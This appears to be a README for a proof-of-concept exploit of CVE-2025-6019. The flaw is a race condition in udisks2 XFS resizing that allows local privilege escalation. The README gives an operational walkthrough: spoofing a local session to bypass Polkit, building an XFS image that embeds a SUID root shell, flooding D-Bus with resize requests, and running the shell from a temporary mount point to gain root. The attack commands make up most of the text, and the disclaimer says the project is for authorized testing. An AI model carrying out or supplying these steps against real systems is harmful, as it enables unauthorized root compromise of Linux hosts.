CVE-2025-6019: udisks2 XFS Resize TOCTOU Privilege Escalation This repository contains a Proof of Concept (PoC) for CVE-2025-6019, a Race Condition vulnerability in udisks2 that allows local privilege escalation via XFS filesystem resizing.

🎯 Target Environments & Compatibility

This exploit is designed to be universal for any Linux system meeting the following criteria:

Vulnerable Service: udisks2 (with D-Bus access enabled).

Filesystem Tool: xfsprogs installed (specifically mkfs.xfs).

Architecture: Agnostic (Works on x86, x64, ARM, etc.).

✅ Tested Environments

The exploit has been verified on the following configuration:

• OS: openSUSE Leap 15.6
• Kernel: Linux 6.4.0-150600.23.65-default (x86_64)
• Virtualization: VMware
• • Target: udisks2 (via D-Bus) Note: The weapon.py script automatically handles the environment PATH setup to locate mkfs.xfs, which is typically restricted to sbin.

🛡️ The Role of the Protofile

The exploitation requires a specially crafted XFS image created with a Protofile. This allows us to define a filesystem structure that includes a SUID root binary (pwnbash) without requiring root privileges during the image creation phase. The mkfs.xfs -p flag uses this template to bake the SUID bit directly into the image's metadata.

🚀 Exploitation Guide (Manual Method)

Step 1: Bypass Polkit Restrictions

Standard users in remote sessions (SSH, Docker) are restricted from using udisks2. Run this script to spoof a local session (seat0): python3 bypass.py

Step 2: Weaponize (Image Creation)

Generate the SUID image using weapon.py. This script uses the XFS protofile to embed a shell with 4755 permissions. python3 weapon.py

Step 3: Trigger the Race

Execute trigger.sh to begin flooding udisks2 with D-Bus resize requests. This forces the daemon to create temporary mount points in /tmp/blockdev.XXXXXX. chmod +x trigger.sh ./trigger.sh

Step 4: Win the Race (Manual Execution)

Since automated scripts can be unstable in resource-constrained environments, the manual method is recommended: Monitor /tmp for temporary mount points: watch -n 0.1 "ls -la /tmp" Identify the Target: Look for a directory with world-readable permissions (e.g., drwxr-xr-x) instead of the default hardened drwx------.

Execute the Payload: Once identified, navigate into the directory and execute the shell:

cd /tmp/blockdev.Q797J3 # Example directory name ./pwnbash -p Result: If the execution occurs within the race window (before the nosuid flag is applied), you will be granted a root shell.

📁 File Descriptions

bypass.py: Configuration script to spoof a local session (seat0) and bypass Polkit restrictions via ~/.pam_environment.

weapon.py: SUID Image generator using the XFS Protofile template.

trigger.sh: D-Bus race condition trigger for udisks2 filesystem resizing.

For a detailed breakdown: 👉 NetaCoding - https://netacoding.blogspot.com/2026/02/new-vulnerability-analysis-udisks2-xfs.html

⚠️ Disclaimer

This project is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.